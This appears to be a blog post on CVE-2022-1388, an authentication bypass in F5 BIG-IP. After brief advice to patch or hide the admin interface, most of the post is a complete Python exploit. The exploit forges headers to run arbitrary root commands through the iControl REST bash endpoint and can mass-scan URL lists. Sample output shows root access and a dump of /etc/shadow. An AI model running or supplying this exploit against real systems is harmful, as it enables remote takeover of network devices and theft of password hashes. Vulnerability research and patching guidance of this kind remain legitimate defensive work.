Ā 

F5 | CVE-2022-1388

A proof of concept (PoC) was developed for a critical vulnerability in F5's BIG-IP networking software that could expose thousands of users to remote control.

The vulnerability, tracked as CVE-2022-1388, could allow an attacker to make undisclosed requests to bypass iControl's REST authentication.


If exploited, an unauthenticated user could get remote code execution (RCE) on an affected device. šŸ‘½


Affected Devices

Everything older than version 17. Patches are available for BIG-IP versions 13-16. BIG-IP version 11 and 12 are vulnerable with no available patch.


So what should you do?

Usually, I recommend patching first and later attending to the configuration issues. But in this case, I will swap this order: First, make sure you are not exposing the admin interface. If you can't manage that: Don't try patching. Turn off the device instead. If the configuration interface is safe: Patch!


ā–“ CVE-2022-1388.py:

import os
import sys
import argparse
import urllib3
import requests
urllib3.disable_warnings()


headers = {
        "User-Agent": "Mozilla/5.0 (X11; Gentoo; rv:82.1) Gecko/20100101 Firefox/82.1",
        "Content-type": "application/json",
        "Connection": "close, X-F5-Auth-Token, X-Forwarded-For, Local-Ip-From-Httpd,X-F5-New-Authtok-Reqd,X-Forwarded-Server,X-Forwarded-Host",
        "X-F5-Auth-Token": "anything",
        "Authorization": "Basic YWRtaW46"}

endpoint = "/mgmt/tm/util/bash"

def usage():
    print("Eg: \n    python3 CVE-2022-1388.py -u https://127.0.0.1")
    print("    python3 CVE-2022-1388.py -u httts://127.0.0.1 -c 'cat /etc/passwd'")
    print("    python3 CVE-2022-1388.py -f urls.txt")
    
def poc(url):
    payload = {"command": "run", "utilCmdArgs": "-c id"}
    try:
        res = requests.post(url+endpoint, headers=headers, json=payload, proxies=None, timeout=15, verify=False)
        if (res.status_code == 200) and ('uid=0(root) gid=0(root) groups=0(root)' in res.text):
            print("[+] {} is vulnerable!!!".format(url))
            return True
        else:
            print("[-] {} is not vulnerable.".format(url))
            return False
    except Exception as e:
        print("[-] {} Exception: ".format(url) + e)
        pass
    
def exp(url, command):
    payload = {"command": "run", "utilCmdArgs": "-c '{}'".format(command)}
    try:
        res = requests.post(url+endpoint, headers=headers, json=payload, proxies=None, timeout=15, verify=False)
        if (res.status_code == 200) and ("tm:util:bash:runstate" in res.text):
            print(res.json()['commandResult'])
            return True
        else:
            print("[-] {} is not vulnerable.".format(url))
            return False
    except Exception as e:
        print("[-] {} Exception: ".format(url) + e)
        pass

if __name__ == '__main__':
    parser = argparse.ArgumentParser(
        description="CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE")
    parser.add_argument('-u', '--url', type=str,
                        help="vulnerability verification for individual websites")
    parser.add_argument('-c', '--command', type=str,
                        help="command execution")
    parser.add_argument('-f', '--file', type=str,
                        help="perform vulnerability checks on multiple websites in a file, and the vulnerable websites will be output to the success.txt file")
    args = parser.parse_args()
    if len(sys.argv) == 3:
        if sys.argv[1] in ['-u', '--url']:
            poc(args.url)
        elif sys.argv[1] in ['-f', '--file']:
            if os.path.isfile(args.file) == True:
                with open(args.file) as target:
                    urls = []
                    urls = target.read().splitlines()
                    for url in urls:
                        if poc(url) == True:
                            with open("success.txt", "a+") as f:
                                f.write(url + "\n")
    elif len(sys.argv) == 5:
        if set([sys.argv[1], sys.argv[3]]) < set(['-u', '--url', '-c', '--command']):
            exp(args.url, args.command)
    else:
        parser.print_help()
        usage()

ā–“ Outputs:


root@DRM:/tmp# python3 CVE-2022-1388.py -u https://<ip-address>
[+] https://<ip-address> is vulnerable!!!

root@DRM:/tmp# python3 CVE-2022-1388.py -u https://<ip-address> -c 'id'
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0

root@DRM:/tmp# python3 CVE-2022-1388.py -u https://<ip-address> -c 'cat /etc/shadow'
...
root:$6$TMuNP0xxxxxxxx
admin:$6$83fzG1vk$7wpUV.vkxxxxxx
...

ā‡” sha512ā€”Produces a 512-bit digest. The encrypted password starts with $6$.


root@DRM:/tmp# python3 CVE-2022-1388.py -u https://<ip-address> -c 'tmsh show sys hardware'

Sys::Hardware
Chassis Information
  Maximum MAC Count  1
  Registration Key   -

Hardware Version Information
  Name        cpus
  Type        base-board
  Model       Intel Xeon Processor (Skylake, IBRS)
  Parameters  --            --
              cache size    4096 KB
              cores         24  (physical:24)
              cpu MHz       2194.838
              cpu sockets   24
              cpu stepping  4


Platform
  Name  BIG-IP Virtual Edition
  BIOS Revision
  Base MAC       52:54:00:xx:55:ba
  Hypervisor     KVM
  Cloud

System Information
  Type                       Z100
  Chassis Serial             191931f7-0dcb-4d7c-45xe
  Level 200/400 Part
  Switchboard Serial
  Switchboard Part Revision
  Host Board Serial
  Host Board Part Revision

gif

66 views0 comments

Recent Posts

See All

Here I will show you a command that will help you to transfer files faster between computers, it's very useful when you need to transfer a large amount of files. You can do it to transfer to others ha

Malicious executables often attempt to hide their behavior and evade detection. By doing so, they present anomalies and suspicious patterns. Pestudio is a free tool that allows you to perform an initi

Do you want to build by yourself a LAN server right on your Windows computer? Here you have some steps to do it works. #1) Go to openspeedtest.com; #2) Click on DOWNLOAD link; #3) Download and install

Ā